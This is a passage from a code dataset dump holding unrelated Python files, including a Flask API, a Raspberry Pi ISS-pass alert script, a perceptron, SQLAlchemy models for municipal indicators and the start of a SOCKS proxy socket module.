the same as the indices of our mask.\n order = np.argsort(ds)\n # We wish to return a single array, so we use `stack` to combine the two nx1\n # arrays into one nx2 array.\n combined_indices = np.stack(indices, 1)\n # Finally, we reorder our combined indices to be in the same order as the sorted distances.\n return [combined_indices[order].astype('int32'), ds[order]]\n\n\ndef add_unit_edges_to_matrix(adj_m, edges):\n \"\"\"\n For a given adjacency matrix and an nx2 array of edges, returns a new\n adjacency matrix with the edges added. Symmetrizes the edges.\n \"\"\"\n new_adj = adj_m.copy()\n for edge in edges:\n x = edge[0]\n y = edge[1]\n new_adj[x][y] = 1\n # new_adj[y][x] = 1\n return new_adj","sub_path":"stad/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"381944971","text":"from flask import Flask\nfrom flask_restful import Resource, Api\n\n\napp = Flask(__name__)\napi = Api(app)\n\nData = []\n\n\nclass People(Resource):\n def get(self, name):\n global Data\n for x in Data:\n if x['Data'] == name:\n return x\n return {'Data': \"Subbu\"}\n\n def post(self, name):\n tem = {'Data': name}\n global Data\n Data.append(tem)\n return tem\n\n def delete(self, name):\n for ind, x in enumerate(Data):\n if x['Data'] == name:\n tem = Data.pop(ind)\n return {'Note': \"Deleted\"}\n\n\napi.add_resource(People, '/Name/')\n\n\napp.run()\n","sub_path":"ccc.py","file_name":"ccc.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132577427","text":"# coding=utf-8\n\n\ntotalSegundos = int(input(\"Por favor, entre com o número de segundos que deseja converter: \"))\n\nsegundosRestantes = totalSegundos % 3600\nsegundos = segundosRestantes % 60\nminutos = segundosRestantes // 60\nhoras = (totalSegundos // 3600) % 24\ndias = (totalSegundos // 3600) // 24\n\nprint(dias, \"dias,\", horas, \"horas,\", minutos, \"minutos e\", segundos, \"segundos.\")\n","sub_path":"segunda-semana/lista-exercicios/resolucao-exercicio-3.py","file_name":"resolucao-exercicio-3.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"231187072","text":"import matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\nfrom mpl_toolkits.mplot3d.axes3d import get_test_data\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nfig = plt.figure( figsize =plt.figaspect( 0.2 ))\nax1 = fig.add_subplot( 1 , 2 , 1 )\nX = np.arange(0 , 20 , 1 )\nY = np.arange(0, 20 , 1 )\nX1 = np.arange(0 ,5 , 1 )\nY2 = np.arange(-2, 3 , 1 )\n\nax1= plt.plot(X, Y**2, 'g^')\nax1=plt.xlabel('etykieta x')\nax1=plt.ylabel('etykieta y')\nax1=plt.title(\"Prosty wykres\")\nax2 = fig.add_subplot( 1 , 2 , 2 )\nax2=plt.plot (X1, abs(Y2*2), label= 'liniowy')\nax2=plt.plot (X1, abs(Y2*2), 'r+')\nax2=plt.xlabel('etykieta x')\nax2=plt.ylabel('etykieta y')\nax2=plt.title(\"Prosty wykres\")\nplt.show()\n","sub_path":"KOLOSzPandasNumpyMatplotLIb/MatPlotLib3d6.py","file_name":"MatPlotLib3d6.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"145473924","text":"# Overhead is defined as 10 degrees in elevation for the observer.\n# The times are computed in UTC and the length of time that the ISS is above 10 degrees is in seconds.\n# Epoch time: https://www.epochconverter.com\n\nimport json, urllib.request, time, pigpio\nfrom gpiozero import LED\nfrom os import system\nfrom time import sleep\n\n#Define variable names for pinouts\n\n#LED\nLED_north = LED(5)\nLED_east = LED(6)\nLED_south = LED(13)\nLED_west = LED(12)\nLED_oneMin = LED(17)\nLED_fiveMin = LED(27)\nLED_tenMin = LED(22)\n\n# Servo\npi = pigpio.pi()\n\nmyServo = 16\nmyServoUp = 530 # Servo duty time for flag raised\nmyServoDown = 1530 # Servo duty time for flag raised\nflagUp = False\n\n# API\nmomLatitude = 43.577090\nmomLongitude = -79.727520\naltitude = 128\nurl = \"http://api.open-notify.org/iss-pass.json?lat={lat}&lon={long}&alt={a}\".format(lat=momLatitude, long=momLongitude, a=altitude)\nrefreshTime = 5 # How often we check API\n\n#Alerts\n# Compare minutes against time remaining for alerts\nalertOne = 10\nalertTwo = 5\nalertThree = 1\n\n# Triggers so we dont have the alert go over multiple times\nalertOneTriggered = False\nalertTwoTriggered = False\nalertThreeTriggered = False\n\nalerts = \"\"\n\n# activate piGpio daemon\nsystem(\"sudo pigpiod\")\n\n#Alerts - put logic here\ndef AlertOne():\n print(\"Alert 1 triggered!\")\n LED_tenMin.on()\n print(\"Ten minute light is on\")\n \ndef AlertTwo():\n print(\"Alert 2 triggered!\")\n LED_tenMin.off()\n print(\"Ten minute light is off\")\n LED_fiveMin.on()\n print(\"Five minute light is on\")\n \ndef AlertThree(duration):\n print(\"Alert 3 triggered!\")\n LED_fiveMin.off()\n LED_oneMin.on()\n print(\"One minute light is on\")\n pi.set_servo_pulsewidth(myServo, myServoUp) # flag raised\n sleep(1)\n pi.set_servo_pulsewidth(myServo, 0) # flag motor off\n sleep(1)\n flagUp = True\n print(\"flag is up\")\n sleep(duration)\n Reset()\n\n#reset everything back to default!\ndef Reset():\n print(\"resetting\")\n LED_tenMin.off()\n LED_fiveMin.off()\n LED_oneMin.off()\n LED_north.off()\n LED_east.off()\n LED_south.off()\n LED_west.off()\n pi.set_servo_pulsewidth(myServo, myServoDown) # flag raised\n sleep(1)\n pi.set_servo_pulsewidth(myServo, 0) # flag motor off\n sleep(1)\n flagUp = False\n \n# Check if an alert has been triggered against the remaining time in minutes\ndef CheckalertTimes(seconds, duration):\n minutes = seconds/60\n minutes = int(minutes)\n# minutes -= 510 # This is an offest for testing\n print(\"debug minutes: \" + str(minutes))\n global alertOneTriggered\n global alertTwoTriggered\n global alertThreeTriggered\n global alerts\n\n if minutes <= alertOne and minutes > alertTwo:\n if alertOneTriggered is False:\n alertOneTriggered = True\n alerts = \"Alerts: {one}m [X] {two}m [ ] {three}m [ ]\".format(one=alertOne, two=alertTwo, three=alertThree)\n AlertOne()\n elif minutes <= alertTwo and minutes > alertThree:\n if alertTwoTriggered is False:\n alertTwoTriggered = True\n alerts = \"Alerts: {one}m [X] {two}m [X] {three}m [ ]\".format(one=alertOne, two=alertTwo, three=alertThree)\n AlertTwo()\n elif minutes <= alertThree and minutes >= 0:\n if alertThreeTriggered is False:\n alertThreeTriggered = True\n alerts = \"Alerts: {one}m [X] {two}m [X] {three}m [X] \\nIIS Overhead is coming in \".format(one=alertOne, two=alertTwo, three=alertThree) + str(minutes*60) + \" seconds\"\n AlertThree(duration)\n else:\n alertOneTriggered = False\n alertTwoTriggered = False\n alertThreeTriggered = False\n alerts = \"Alerts: {one}m [ ] {two}m [ ] {three}m [ ]\".format(one=alertOne, two=alertTwo, three=alertThree)\n # print(\"IIS is \" + str(int(minutes)) + \" minutes away\")\n \n\"\"\"\n\n# Display progress on LCD(16) - Future feature\ndef ShowLCD(tLeft, dur):\n value = int(tLeft / 60) # convert time to minutes\n value -= 159 # Use this to create an offset in minutes to test the data (if 20 mins are left, value -= 4 = 16 mins left)\n if 16 >= value: # if each chararacter on the LCD is 1, if there is less than 16 minutes left, show updates\n LCDDisplay = \"================\" # number of characters match LCD\n invertValue = 16 - value\n LCDDisplay = LCDDisplay[:invertValue] + \"0\" + LCDDisplay[invertValue+1:]\n print (str(LCDDisplay))\n\n if value == 0: # if it's less than 1 minute, display message\n LCDDisplay = \"Overhead {secs} Sec\".format(secs=dur)\n print (str(LCDDisplay))\n\n\"\"\"\n\ndef Error(e):\n #Define error behaviour, for example you can add an network indicator LED, etc.\n print(\"ERROR: \" + e)\n\nwhile True:\n\n try:\n #Get JSON data\n req = urllib.request.urlopen(url)\n resp = json.loads(req.read())\n\n # Matches the 'iss-pass.json' json structure\n request = resp[\"request\"] # why is this one resp?\n latitude = request[\"latitude\"]\n longitude = request[\"longitude\"]\n altitude = request[\"altitude\"]\n datetime = request[\"datetime\"] # generated time, not current - helps if we can't get current time on a device\n \n # Get first overhead response\n response = resp[\"response\"]\n # we're only grabbing the first index ('0') because we only need to see the next upcoming pass\n duration = response[0][\"duration\"] \n risetime = response[0][\"risetime\"]\n\n # Get current time (epoch time)\n currentTime = int(time.time())\n timeLeft = risetime - currentTime\n\n # Check the remaining minutes against the alert times\n CheckalertTimes(timeLeft, duration)\n\n # Formatted output to view\n print(\"\")\n print(\"=========[ Overhead ISS Pass ]==========\")\n print(time.strftime(\"Next: %Y-%m-%d %I:%M:%S %p\", time.localtime(risetime)))\n print(\"Duration: \" + str(duration) + \" seconds\")\n print(\"Time Left: \" + str(int(timeLeft/60)) + \" minutes\")\n print(alerts)\n print(\"========================================\")\n # ShowLCD(timeLeft, duration)\n except urllib.error.URLError as ex:\n Error(str(ex.reason))\n pass\n \n time.sleep(refreshTime) \n\n\"\"\"\nGPIO.cleanup() # need this somewhere?\n\"\"\"\n","sub_path":"PieSS_v01.py","file_name":"PieSS_v01.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"455541871","text":"# 2021-04-14, lucas.mayer.almeida@ccc.ufcg.edu.br\n# A função coloca os valores menores que a média \n# nas primeiras posições da lista e os maiores que a média logo depois\n\ndef organiza_por_media(nums) :\n total = 0\n for i in nums :\n total += i\n if len(nums) == 0:\n return nums\n media = total / len(nums)\n for i in range(len(nums)) :\n j = i\n while j > 0 and nums[j] <= media and nums[j-1] > media :\n nums[j], nums[j-1] = nums[j-1], nums[j]\n j -= 1\n return nums\n","sub_path":"atividades/organiza_lista_pela_media/questao.py","file_name":"questao.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"626087428","text":"from operator import ne\nimport numpy as np\n\n\ndef step_function(y_prim, negative_class=-1):\n if y_prim > 0:\n return 1\n\n return negative_class\n\n\ndef compute_weight_update(x, y, weights, negative_class=-1):\n y_pred = step_function(np.matmul(weights.T, x), negative_class)\n if y == y_pred:\n return np.zeros(x.shape[0])\n\n return y * x\n\n\ndef perceptron_learning(X, labels, lr=0.001, max_iters=100, seed=42, w_init=None, negative_class=-1):\n # add bias\n X = np.c_[X, np.ones(X.shape[0])]\n dim_num = X.shape[1]\n print(X.shape)\n it_num = 0\n weights = np.random.default_rng(seed).normal(0, 0.5, dim_num) if w_init is None else w_init\n weight_history = list()\n weight_update = np.ones((1, dim_num))\n while np.any(weight_update != 0):\n weight_history.append(weights.copy())\n weight_update = np.sum(\n list(\n map(\n lambda x, y: compute_weight_update(x, y, weights=weights, negative_class=negative_class), X, labels)),\n axis=0)\n weights += lr*weight_update\n it_num += 1\n\n if it_num >= max_iters:\n print('Warning: reached maximum numbers of iterations.')\n break\n\n print(f'Number of epochs: {it_num}')\n return weights, weight_history\n\n\ndef perc_predict(X, weights):\n # add bias\n X = np.c_[X, np.ones(X.shape[0])]\n # predict\n y_pred = X @ weights\n # threshold\n y_pred[y_pred > 0] = 1\n y_pred[y_pred <= 0] = -1\n return y_pred\n","sub_path":"lab1/part1/algorithms/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"596600049","text":"from ..app import db\nfrom ..forms import Form\nfrom wtforms import StringField, validators, SelectField, SelectMultipleField, IntegerField\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import relationship\nfrom wtforms.widgets import TextArea, HiddenInput\n\nfrom sqlalchemy import (\n Column,\n Date,\n Float,\n ForeignKey,\n Integer,\n String,\n Text,\n func,\n Boolean,\n event,\n)\n\n\nclass DataPoint(db.Model):\n \"\"\"\n A single data point (yearly value) of an indicator\n \"\"\"\n __tablename__ = 'datapoints'\n\n id = Column(Integer, autoincrement=True, primary_key=True)\n dataset_id = Column(Integer, ForeignKey('datasets.id'), index=True, nullable=False)\n indicator_id = Column(Integer, ForeignKey('indicators.id'), index=True, nullable=False)\n region_id = Column(Integer, ForeignKey('regions.id'), index=True, nullable=False)\n type_id = Column(Integer, ForeignKey('types.id'), index=True, nullable=False)\n theme_id = Column(Integer, ForeignKey('themes.id'), index=True, nullable=False)\n value = Column(Float, unique=False, nullable=False)\n year = Column(Integer, index=True, unique=False, nullable=False)\n\n # Associations\n dataset = relationship(\"DataSet\", backref='dataset')\n indicator = relationship(\"Indicator\")\n region = relationship(\"Region\", backref='region')\n type = relationship(\"Type\")\n theme = relationship(\"Theme\")\n\n def __repr__(self):\n return ''.format(self.id)\n\n\nclass DataSet(db.Model):\n \"\"\"\n The dataset a data point belongs to\n \"\"\"\n __tablename__ = \"datasets\"\n\n id = Column(Integer, primary_key=True)\n ds_name = Column(String(80), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"\" % (self.ds_name)\n\n @classmethod\n def create_defaults(self):\n text = \"\"\"\n Population size\n Population density\n Households\n Population growth rate\n Female population\n Male population\n Sex ratio\n Dependency ratio\n Child population\n Youth population\n Adult population\n Elderly population\n Net migration rate\n International immigrants rate\n Indigent\n Poverty rate\n Gini Coefficient\n Life expectancy - Male\n Life expectancy - Female\n Gross Value Add\n Exports\n Imports\n Household income\n Cost of living\n Economically active population\n Employment Absorption Rate\n Employment\n Unemployment Rate\n Vulnerable population unemployment\n Human Development Index\n Fixed-landline connections per 100,000\n Mobile connections per 100,000\n Internet connections per 100,000\n Water availability\n Water consumption\n Non-revenue water\n Water losses\n Risk Score - blue drop\n Risk score - green drop\n Energy supply - Petrol\n Energy supply - Diesel\n Energy supply - Coal\n Energy supply - Paraffin\n Energy supply - LPG\n Energy supply - HFO\n Energy supply - JetFuel + AvGas\n Energy consumption (GJ)\n Energy intensity - Residential\n Energy intensity - Commercial\n Energy intensity - Industrial\n Energy intensity - Transport\n Energy intensity - Government\n Energy intensity - Agriculture\n Renewable energy\n Energy losses\n Green house gas emissions\n Waste recycling (tonnes)\n Residential fuel combustion - heating - coal\n Residential fuel combustion - heating - wood\n Residential fuel combustion - cooking - coal\n Residential fuel combustion - cooking - wood\n Open Space\n Energy use - Residential\n Energy use - Commercial\n Energy use - Industrial\n Energy use - Transport\n Energy use - Government\n Energy use - Agriculture\n Energy use - Losses\n Emissions - Residential\n Emissions - Commercial\n Emissions - Industrial\n Emissions - Transport\n Emissions - Government\n Emissions - Agriculture\n Emissions - Losses\n Emissions - All fuels excl aviation and marine\n Male learner enrolment- primary\n Female learner enrolment- primary\n Male learner enrolment- secondary\n Female learner enrolment- secondary\n Learner-educator ratio\n Completion rate - primary school 2011\n Completion rate - secondary school 2011\n Literacy rates\n Matric pass rate\n Hospital beds - public sector\n Mortality - under 5 years per 1000\n Multiple deprivation index\n Dwelling type - formal\n Dwelling type - informal\n Dwelling type - traditional\n Dwelling tenure - owned + paid\n Dwelling tenure - owned + not paid\n Dwelling tenure - rented\n Dwelling tenure - occupied + no rent\n Informal shelter growth\n Housing Affordability Ratio\n Housing Affordability Index\n Transport passengers - Train\n Transport passengers - Bus\n Transport passengers - Taxi\n Transport passengers - Car / Truck driver\n Transport passengers - Car / Truck passenger\n Transport passengers - Walk only\n Transport passengers - Other\n Motor vehicle ownership\n Inpatient bed utilisation rate\n Educational level - no schooling\n Educational level - some primary\n Educational level - completed primary\n Educational level - some secondary\n Educational level - grade 12 / std 9\n Educational level - higher education\n Educational level - other\n Educational level - total\n Municipal management vacancies\n Municipal posts - Community and Social Services\n Municipal posts - Finance and Administration\n Municipal posts - Electricity\n Municipal posts - Environmental Protection\n Municipal posts - Health\n Municipal posts - Public Safety\n Municipal posts - Road Transport\n Municipal posts - Sport and Recreation\n Municipal posts - Waste Management\n Municipal posts - Waste Water Management\n Municipal posts - Water\n Municipal posts - Other\n Municipal staff vacancies\n Voter turnout - Local\n Voter Turnout - National\n Access to water - Piped in dwelling\n Access to water - Piped in yard\n Access to water - Communal within 200m\n Access to water - Communal more than 200m\n Access to water - No piped\n Access to sanitation - Flush toilet\n Access to sanitation - VIPs\n Access to sanitation - Pit toilet\n Access to sanitation - Bucket System\n Access to sanitation - No toilet\n Access to electricity - Lighting only\n Access to electricity - Lighting and other\n Access to electricity - Not using\n Access to refuse removal - Weekly by authority\n Access to refuse removal - Less than weekly by authority\n Access to refuse removal - Community removal\n Access to refuse removal - Personally removed\n Access to refuse removal - No removal\n Clinics - provincial\n External audit\n Informal settlements\n Residential rates\n Business rates\n Services levy\n Grants\n Capital grants & transfers\n Operating surplus\n Debtors\n Bad Debt\n Remuneration costs\n Liabilities\n Cash position\n Acid test ratio\n Debt to income ratio\n Current ratio\n Debt ratio\n Budget funding\n Wasteful expenditure\n Operating expenditure - Employee related\n Operating expenditure - Remuneration of councillors\n Operating expenditure - Bad debt\n Operating expenditure - Repairs and maintenance\n Operating expenditure - Bulk purchase\n Operating expenditure - Other operating\n Operating expenditure - Total\n Operating expenditure - Ave annual growth\n Operating expenditure - Repairs and maintenance growth\n Affordability of municipal bills - Municipal Bill\n Affordability of municipal bills - Benchmark income\n Affordability of municipal bills - Municipal bill as percent of income\n Affordability of municipal bills - change since 2010\n Voter turnout- local\n Voter registration - local\n \"\"\"\n\n dataset = []\n for s in text.strip().split(\"\\n\"):\n i = DataSet()\n i.ds_name = s.strip()\n dataset.append(i)\n\n return dataset\n\n @classmethod\n def all(cls):\n return cls.query.order_by(DataSet.ds_name).all()\n\n\nclass Indicator(db.Model):\n \"\"\"\n The indicator a data point can belong to\n \"\"\"\n __tablename__ = \"indicators\"\n\n id = Column(Integer, primary_key=True)\n in_name = Column(String(80), nullable=False, unique=True)\n unit = Column(String(80), nullable=True, unique=False)\n definition = Column(String(400), nullable=True, unique=False)\n theme = Column(String(80), nullable=True, unique=False)\n sub_theme = Column(String(80), nullable=True, unique=False)\n source = Column(String(500), nullable=True, unique=False)\n frequency = Column(String(80), nullable=True, unique=False)\n\n def __repr__(self):\n return \"\" % (self.in_name)\n\n @classmethod\n def create_defaults(self):\n text = \"\"\"\n Population size\n Population density\n Households\n Population growth rate\n Female population\n Male population\n Sex ratio\n Dependency ratio\n Child population\n Youth population\n Adult population\n Elderly population\n Net migration rate\n International immigrants rate\n Indigent\n Poverty rate\n Gini Coefficient\n Life expectancy\n Gross Value Add\n Exports\n Imports\n Household income\n Cost of living\n Economically active population\n Employment Absorption Rate\n Employment\n Unemployment Rate\n Vulnerable population unemployment\n Human Development Index\n Fixed-landline connections per 100,000\n Mobile connections per 100,000\n Internet connections per 100,000\n Water availability\n Water consumption\n Non-revenue water\n Water losses\n Risk Score - blue drop\n Risk score - green drop\n Energy supply\n Energy consumption (GJ)\n Energy intensity\n Renewable energy\n Energy losses\n Green house gas emissions\n Waste recycling (tonnes)\n Residential fuel combustion\n Open Space\n Energy use\n Emissions\n Learner enrolment - primary\n Learner enrolment - secondary\n Learner-educator ratio\n Completion rate - primary school\n Completion rate - secondary school\n Literacy rates\n Matric pass rate\n Hospital beds - (public sector)\n Mortality - under 5 years per 1000\n Multiple deprivation index\n Dwelling type\n Dwelling tenure\n Informal shelter growth\n Housing Affordability Ratio\n Housing Affordability Index\n Transport passengers\n Motor vehicle ownership\n Inpatient bed utilisation rate\n Educational level\n Municipal management vacancies\n Municipal posts\n Municipal staff vacancies\n Voter turnout - Local\n Voter Turnout - National\n Access to water\n Access to sanitation\n Access to electricity\n Access to refuse removal\n Clinics - provincial\n External audit\n Informal settlements\n Residential rates\n Business rates\n Services levy\n Grants\n Capital grants & transfers\n Operating surplus\n Debtors\n Bad Debt\n Remuneration costs\n Liabilities\n Cash position\n Acid test ratio\n Debt to income ratio\n Current ratio\n Debt ratio\n Budget funding\n Wasteful expenditure\n Operating expenditure\n Affordability of municipal bills\n Voter turnout- local\n Voter registration - local\n \"\"\"\n\n indicator = []\n for s in text.strip().split(\"\\n\"):\n i = Indicator()\n i.in_name = s.strip()\n indicator.append(i)\n\n return indicator\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Indicator.in_name).all()\n\n\nclass Region(db.Model):\n \"\"\"\n The geographic region the data point belongs to\n \"\"\"\n __tablename__ = \"regions\"\n\n id = Column(Integer, primary_key=True)\n re_name = Column(String(50), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"\" % (self.re_name)\n\n @classmethod\n def create_defaults(self):\n text = \"\"\"\n Johannesburg\n Tshwane\n Cape Town\n EThekwini\n Ekurhuleni\n Nelson Mandela Bay\n Buffalo City\n Mangaung\n Msunduzi\n Western Cape\n Eastern Cape\n Northern Cape\n Free State\n KwaZulu-Natal\n North West\n Gauteng\n Mpumalanga\n Limpopo\n National\n \"\"\"\n\n region = []\n for s in text.strip().split(\"\\n\"):\n i = Region()\n i.re_name = s.strip()\n region.append(i)\n\n return region\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Region.re_name).all()\n\n\nclass WaziRegion(db.Model):\n \"\"\"\n The geographic region the data point belongs to\n \"\"\"\n __tablename__ = \"wazi_regions\"\n\n id = Column(Integer, primary_key=True)\n re_name = Column(String(50), index=True, nullable=False, unique=True)\n wazi_name = Column(String(50), index=True, nullable=False, unique=True)\n wazi_abr = Column(String(10), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"\" % (self.re_name)\n\n @classmethod\n def create_defaults(self):\n\n wazi_regions = {1: {'name': 'Johannesburg', 'wazi_name': 'city-of-johannesburg', 'abbreviation': 'JHB'},\n 2: {'name': 'Tshwane', 'wazi_name': 'city-of-tshwane', 'abbreviation': 'TSH'},\n 3: {'name': 'Cape Town', 'wazi_name': 'city-of-cape-town', 'abbreviation': 'CPT'},\n 4: {'name': 'EThekwini', 'wazi_name': 'ethekwini', 'abbreviation': 'ETH'},\n 5: {'name': 'Ekurhuleni', 'wazi_name': 'ekurhuleni', 'abbreviation': 'EKU'},\n 6: {'name': 'Nelson Mandela Bay', 'wazi_name': 'nelson-mandela-bay', 'abbreviation': 'NMA'},\n 7: {'name': 'Buffalo City', 'wazi_name': 'buffalo-city', 'abbreviation': 'BUF'},\n 8: {'name': 'Mangaung', 'wazi_name': 'mangaung', 'abbreviation': 'MAN'},\n 9: {'name': 'Msunduzi', 'wazi_name': 'the-msunduzi', 'abbreviation': 'KZN225'}\n }\n\n waziregion = []\n for i in range(1, 10):\n r = WaziRegion()\n r.re_name = wazi_regions[i]['name']\n r.wazi_name = wazi_regions[i]['wazi_name']\n r.wazi_abr = wazi_regions[i]['abbreviation']\n waziregion.append(r)\n\n return waziregion\n\n @classmethod\n def all(cls):\n return cls.query.order_by(WaziRegion.id).all()\n\n\nclass Type(db.Model):\n \"\"\"\n The geographic data type\n \"\"\"\n __tablename__ = \"types\"\n\n id = Column(Integer, primary_key=True)\n ty_name = Column(String(50), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"\" % (self.ty_name)\n\n @classmethod\n def create_defaults(self):\n text = \"\"\"\n City\n Province\n National\n \"\"\"\n\n types = []\n for s in text.strip().split(\"\\n\"):\n i = Type()\n i.ty_name = s.strip()\n types.append(i)\n\n return types\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Type.ty_name).all()\n\n\nclass Theme(db.Model):\n \"\"\"\n The geographic data type\n \"\"\"\n __tablename__ = \"themes\"\n\n id = Column(Integer, primary_key=True)\n th_name = Column(String(50), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"\" % (self.th_name)\n\n @classmethod\n def create_defaults(self):\n text = \"\"\"\n Demographics\n Productive\n Sustainable\n Inclusive\n Well-governed\n \"\"\"\n\n theme = []\n for s in text.strip().split(\"\\n\"):\n i = Theme()\n i.th_name = s.strip()\n theme.append(i)\n\n return theme\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Theme.th_name).all()\n\n\nclass ExploreForm(Form):\n\n dataset_id = SelectField('Dataset', [validators.Optional()])\n indicator_id = SelectField('Indicator', [validators.DataRequired()])\n region_id = SelectField('Region', [validators.Optional()])\n type_id = SelectField('Region Type', [validators.Optional()])\n theme_id = SelectField('Indicator Theme', [validators.Optional()])\n year = SelectField('Year', [validators.Optional()])\n explore_submitted = IntegerField('Submitted', default=0, widget=HiddenInput())\n\n def __init__(self, *args, **kwargs):\n super(ExploreForm, self).__init__(*args, **kwargs)\n remove_list = ['Poverty rate', 'Gini Coefficient', 'Gross Value Add', 'Exports', 'Multiple deprivation index',\n 'Human Development Index']\n self.dataset_id.choices = [[str(c.id), c.ds_name] for c in DataSet.all() if c.ds_name not in remove_list]\n self.dataset_id.choices.insert(0, ('', 'Empty'))\n self.indicator_id.choices = [[str(c.id), c.in_name] for c in Indicator.all() if c.in_name not in remove_list]\n self.indicator_id.choices.insert(0, ['', 'Empty'])\n self.region_id.choices = [[str(c.id), c.re_name] for c in Region.all()]\n self.region_id.choices.insert(0, ('', 'Empty'))\n self.type_id.choices = [[str(c.id), c.ty_name] for c in Type.all()]\n self.type_id.choices.insert(0, ('', 'Empty'))\n self.theme_id.choices = [[str(c.id), c.th_name] for c in Theme.all()]\n self.theme_id.choices.insert(0, ('', 'Empty'))\n self.year.choices = [[str(i), str(y)] for i, y in enumerate(range(1996, 2018))]\n self.year.choices.insert(0, ('', 'Empty'))\n\n def validate(self):\n return super(ExploreForm, self).validate()\n\n def populate_obj(self, obj):\n super(ExploreForm, self).populate_obj(obj)\n\n","sub_path":"scoda/models/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":18784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"251090572","text":"from django.conf.urls import patterns, url\n\nfrom app.views import views as main\nfrom app.views import oauth\n\nurlpatterns = patterns('',\n url(r'^login/$', oauth.login, name='login'),\n url(r'^auth_url_redirect/$', oauth.auth_url_redirect, name='auth_url_redirect'),\n\n url(r'^$', main.index, name='index'),\n url(r'^home/$', main.home, name='home'),\n\n url(r'^(?P\\w+)/hot/$', main.hot, name='hot'),\n url(r'^(?P\\w+)/next/$', main.next_page, name='next_page'),\n\n url(r'^funny/(?P\\d|\\w+)/comments/$', main.fetch_comments, name='fetch_comments'),\n )\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"405177955","text":"# -*- coding: UTF-8 -*- \r\n#!/usr/bin/env python\r\n# \r\n#SocksiPy - Python SOCKS module.\r\n#Version 1.00\r\n#\r\n#Copyright 2006 Dan-Haim. All rights reserved.\r\n#\r\n#Redistribution and use in source and binary forms, with or without modification,\r\n#are permitted provided that the following conditions are met:\r\n#1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer.\r\n#2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n#3. Neither the name of Dan Haim nor the names of his contributors may be used\r\n# to endorse or promote products derived from this software without specific\r\n# prior written permission.\r\n# \r\n#THIS SOFTWARE IS PROVIDED BY DAN HAIM \"AS IS\" AND ANY EXPRESS OR IMPLIED\r\n#WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\r\n#MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO\r\n#EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\r\n#INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\r\n#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA\r\n#OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\r\n#LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\r\n#OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.\r\n#\r\n# Copyright 2010- Hui Zhang\r\n# E-mail: hui.zh012@gmail.com\r\n#\r\n# Distributed under the terms of the GPL (GNU Public License)\r\n\r\n__all__ = ['Sock', 'SockStatus', 'SockProxy', 'ProxyError',\r\n ]\r\n\r\nimport struct\r\nfrom collections import namedtuple\r\nfrom base64 import b64encode\r\nfrom urllib import unquote\r\nfrom socket import socket, gethostbyname, inet_aton, inet_ntoa, error, SOL_SOCKET, SO_ACCEPTCONN\r\nimport errno\r\n\r\nfrom .attribute import attribute\r\nfrom .dispatcher import xyobj\r\n\r\nSockProxy = namedtuple('SockProxy', 'type host port user password rdns')\r\nclass ProxyError(Exception): pass\r\nclass SockStatus:\r\n CLOSED, CREATED, CONNECTED, BOUND, ACCEPTING, UNKNOWN = range(6)\r\n\r\nclass Sock(xyobj):\r\n ## should be set before serve\r\n so_family = 2\r\n so_type = 1\r\n so_proto = 0\r\n so_blocking = 1\r\n so_timeout = None\r\n \r\n so_proxy = None\r\n so_proxy_sock = None\r\n so_proxy_peer = None\r\n\r\n ## the real socket object\r\n @attribute\r\n def so_socket(self):\r\n s = socket(self.so_family, self.so_type, self.so_proto)\r\n s.settimeout(self.so_timeout)\r\n self.so_proxy_sock = None\r\n self.so_proxy_peer = None\r\n return s\r\n \r\n @so_socket.onchanged()\r\n def so_socket(self, old, new):\r\n self.signal('socketChanged').emit(old, new)\r\n\r\n #===========================================================================\r\n # handy methods\r\n #===========================================================================\r\n def config(self, **kwargs):\r\n for k, v in 